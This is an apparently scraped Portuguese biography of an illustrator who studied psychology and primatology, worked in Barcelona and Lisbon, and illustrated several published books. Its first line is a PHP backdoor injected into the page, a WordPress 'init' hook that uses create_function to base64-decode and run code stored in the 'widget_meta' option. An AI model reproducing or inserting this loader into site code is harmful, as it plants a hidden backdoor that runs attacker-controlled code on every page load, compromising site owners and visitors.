add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );
Em 2005 fez Erasmus em Granada, onde entre a psicologia, aproveitou para aplicar a ilustração no Curso de Cerâmica com a artista colombiana María Avilla.
Depois da licenciatura, pegou nas suas coisinhas e foi para Barcelona, tirar o mestrado em Primatologia, onde aproveitava para desenhar um grupo de chimpanzés no Zoo de Barcelona.
E o desassossego continuou. Ilustrava, escrevia e inventava histórias.
E a ilustração foi-se tornando um assunto cada vez mais sério. Fez projetos para serviços educativos, associações, Universidades, laboratórios e trabalhou com diversas Editoras de livros. E porque sempre gostou de livros e ilustração, enquanto fazia um batido de morango, pensou que talvez pudesse aprender um pouco mais. Aos 28 anos, foi para o mestrado em Ilustração Artística, no ISEC – Lisboa.
Desde então, ilustrou vários livros publicados, entre os quais “Uma visita de estudo diferente” pela Papiro Editora, ilustrou o livro “Meu coração minhas algemas” pela Editora Garamond, e “A minha família é a melhor do mundo e a tua?” da editora Fonte da Palavra. Em 2011 recebe uma Menção Honrosa no concurso “Ilustra um passeio de domingo” da Casa da Animação no Porto. Já expôs no Museu do Traje em Lisboa, no “Atelier 73” e no “Ébora” em Évora.
Estagiou no Centro de Saúde de Évora e actualmente, entre ilustrações, está a realizar a dissertação no mestrado em Psicologia Clínica e da Saúde na Universidade de Évora.
É autor ilustrador de vários livros e revistas publicados nacionais e internacionais. E agora, já pode desenhar elefantes com peixes na barriga, sem que isso seja um problema.